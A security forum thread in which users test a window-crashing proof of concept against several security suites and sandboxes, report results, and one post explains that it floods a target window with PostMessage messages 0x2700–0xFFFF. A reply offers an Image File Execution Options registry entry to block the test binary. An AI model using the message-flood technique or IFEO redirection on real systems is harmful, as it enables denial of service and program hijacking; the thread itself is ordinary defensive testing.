POC of Terminating Processes

Thanks for the information.

I'm going to re run the test now, But I'll do a reboot first and remove it from my computer security policy.

Cheers,
Josh

 

No alerts with CIS here. Proactive paranoid mode.

 

I ran the POC unsandboxed and targeted the open Sandboxie Control window's title. I concur that if I run the POC sandboxed, it just crashes.

 

Hmmm... what detection u mean? this is simple execution alert that will be given by any classical HIPS.

 

Do you run CIS with "Parental Control-silent mode"?

 

I received an alert, but only after upping the image execution control from normal to aggressive.

 

Hi all,

Tested this POC against :

OA - Failed (no prompt)

OA run safer - Failed (no prompt)

a² Malware-IDS - Failed (no prompt)

GeSwall - Passed but the POC start eating all my CPU struggling against GW

Anyone have an idea how this POC crashes targeted window ?

Will report OA results to Tall Emu staff

Regards,

MaB

 

The POC just uses PostMessage flood with msg 0x2700 to 0xFFFF to the target window. After this it calls FindWindow to see if the target window is still found and if so, repeats the above PM flood.

 

Thanks stacks for this explanation

Regards,

MaB

 

Nope.

I mean I got just execution alert.

 

Yes, of course...

 

Strange. Whether I click allow or deny at that prompt, notepad crashes. Tested on Vista SP2 with...

ZoneAlarm Anti-virus version:9.0.029.000
TrueVector version:9.0.029.000
Driver version:9.0.029.000
Anti-virus engine version:8.0.1.33
Anti-virus signature DAT file version:986392800

 

Would be interesting to know results for even more software, e.g. isolating ones like DW.

 

Why is this only effective in crashing some applications and not others?
Is this something that security software should be responsible for defending against?

 

Well, not too fun if someone makes a disguise of a .bat file which simply tries to formats all sorts of drive letters without the need for confirmation, is it?

Not a responsibility for the security software (maybe BB/HIPS for example actually) - at least not AM software - as it's not an attack against it (self-defense) or considered malware, but wow, what a disaster.


I may have misunderstood your message, but I wanted to write this anyway.

 

COMODO are now looking into this for CIS (FYI CIS users). I will report back when they have finished analyzing this.

Cheers,
Josh

 

Thanks for the update mate

 

First impression by Comodo, (Before even digging into the code of this POC), Was that, it's probably windows message based useless POC. Because it's simply Freezing/Crashing Applications. It's not like it's sending data to a hacker, or seriously damaging the OS.

Off course this is only my opinion, But we need to look at: Is this a threat or a inconvenience to the user? and can this replicate/perform further malicious actions (Malware in the wild?)

ssj100, If you take a look at this thread that you created: https://forums.comodo.com/leak_testingattacksvulnerability_research/comodo_bypassed-t43061.0.html - If you read through it there is different scenarios that happen with Different OS's, Different CIS Settings, And I am sure there is many other circumstances too... However, we CAN say that this indeed did bypass CIS.

Anyway, I won't jump to any radical conclusions just yet... I am sure people have other opinions or scenarios about this, including Vendors. Let's wait for the results... I'll keep you updated...

Cheers,
Josh

 

Uuuhm.. there was no crash here.
Yes, VISTA SP2 too...
ZA program control with all advanced control enabled (time attack, component, etc)

Can't test it again... moved to ZA Extreme beta and deteled the POC.
PM the POC and will test again with ZA Extreme

ZoneAlarm Extreme Security version:9.0.034.000
TrueVector version:9.0.034.000
Driver version:9.0.034.000
Anti-virus engine version:8.0.1.33
Anti-virus signature DAT file version:986407136
Anti-spyware engine version:5.0.210.0
Anti-spyware signature DAT file version:01.200812.5005
AntiSpam version:6.0.0.2083
ZoneAlarm ForceField 1.4.332.0
ZoneAlarm ForceField Spyware Sites Database 03.740


Fax

 

Just finished running the POC against the new ZA Extreme beta and get the same results. I also see that if I target the POC at ZA's UI, Vista locks up and ultimately requires a hard reset to recover. I'll PM you a link later today if you're still interested.

 

Although Sandboxie blocks the POC, it does generate multiple SBIE1242 Monitor buffer overflow errors if you choose to monitor the sandboxed POC with Resource Access Monitor.

 

These POCs can't even get past windows if you want.
Merge the below and try test.exe again.

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\test.exe]
"Debugger"="C:\\Windows\\System32\\calc.exe"

 

Of course... you may be having other services/dll/sys in-between that makes it freezing and/or crashing.

Yours or mine?

Fax

 

Hi can some one please pm download link so I can test with my MD rule set.